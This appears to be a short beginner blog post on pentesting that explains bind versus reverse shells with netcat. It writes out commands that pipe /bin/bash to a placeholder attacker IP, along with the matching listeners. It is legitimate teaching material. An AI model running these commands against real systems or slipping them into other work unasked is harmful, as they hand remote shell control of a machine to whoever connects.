Home page
Other Entries

What is the difference between a bind shell and a reverse shell?

As you get into the world of pentesting/hacking, you may have heard of the terms "bind shell" and "reverse shell" thrown around a lot. But what do these actually mean? In this post I'm going to try and explain, and provide simple examples, using netcat.

It's not overly complex, so this is going to be a short one, but here it is.

Reverse Shell

A reverse shell is where the victim connects back to the attacker, and the attacker listens on a port for the connection from the victim machine. Here is a basic run through of what this looks like using netcat.

First, you would run the command nc -lvp <port> on the attacker's machine. The -l flag specifies that netcat is listening for a connection, the v increases the verbosity (more info in your terminal), and the p says the next part of the command is going to specify the port.

Then on the victim's machine, you would run nc <attacker ip> <port> -e "/bin/bash". This command is telling netcat to make a connection to <attacker ip> on the port <port>, running the command "/bin/bash" back to the attacker's computer. You can change the command after the -e flag to run other shells, such as "/bin/sh" or "/bin/zsh".

Bind Shell

A bind shell is pretty much the opposite of a reverse shell. The attacker is now connecting forward to the victim's machine, so the victim listens for a connection from the attacker. The commands to do this are similar, except this time, we need the victim to provide a command for the attacker to run when they connect. On the victim's machine, you would run nc -lvp <port> -e "/bin/bash", and on the attacker's machine, you would want to run nc <victim ip> <port>. This basically means the victim listens on a specific port for an incoming connection, then routes that connection to the command specified.